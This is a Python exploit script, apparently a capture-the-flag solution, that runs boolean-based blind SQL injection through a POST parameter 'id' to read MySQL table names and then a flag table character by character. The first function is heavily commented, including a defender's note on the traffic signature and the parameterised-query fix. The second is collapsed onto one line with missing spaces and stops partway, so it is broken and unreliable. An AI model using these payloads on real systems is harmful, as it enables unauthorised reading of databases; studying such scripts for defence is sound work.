def exp1():
    """Extract the ``sys.x$schema_flattened_keys`` table-name list one character at a time.

    Boolean-based blind SQL injection through the POST parameter ``id``: each
    request injects a comparison of one character of the inner ``select`` result
    against a guess, and the substring ``'Nu1L'`` in the response body is the
    true/false oracle.  Progress is printed to stdout; nothing is returned.

    Depends on module-level names not defined in this block: ``url`` (the target
    endpoint), ``requests`` and ``string`` -- presumably bound at the top of the
    script.

    Defender's view: the traffic signature is a burst of POSTs to one endpoint
    whose ``id`` value contains ``substr((select`` and ``/**/`` comment-as-space
    tokens; the root cause is ``id`` being concatenated into the SQL text, and a
    parameterised query removes it.
    """
    # Candidate alphabet: digits, ASCII letters and punctuation, minus the three
    # characters that would break the single-quoted literal in the payload.
    str1 = ('0123456789'+string.ascii_letters+string.punctuation).replace("'","").replace('"','').replace('\\','')
    flag = ''
    # Inner query whose result is read out; x$schema_flattened_keys is a view of
    # the MySQL ``sys`` schema, so the oracle presumes a MySQL backend.
    select = 'select group_concat(table_name) from sys.x$schema_flattened_keys'
    # j is the 1-based character position (at most 39 characters are recovered);
    # for each position every candidate is tried until the oracle answers true.
    for j in range(1,40):
        for i in str1:
            # /**/ replaces spaces; the injected term is AND-ed onto the
            # original condition so the page content reflects its truth value.
            paylaod = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i)
            #print(paylaod)
            data = {
                'id': paylaod,
            }
            r = requests.post(url,data=data)
            if 'Nu1L' in r.text:
                flag += i
                print(flag)
                break
        # NOTE: a position where no candidate matches is skipped without any
        # marker, so the printed value can be shorter than the real one, and the
        # outer loop keeps sending requests for all 39 positions even after the
        # result string has been exhausted.
defexp2(): str1 = ('-0123456789'+string.ascii_uppercase+string.ascii_lowercase+string.punctuation).replace("'","").replace('"','').replace('\\','') flag = '' flag_table_name = 'f1ag_1s_h3r3_hhhhh' for j inrange(1,39): for i in str1: i = flag+i paylaod = "1&&((select 1,concat('{}~',CAST('0' as json))) < (select * from {} limit 1))".format(i,flag_table_name) #print(paylaod) data = { 'id': paylaod, } r = requests.post(url,data=data)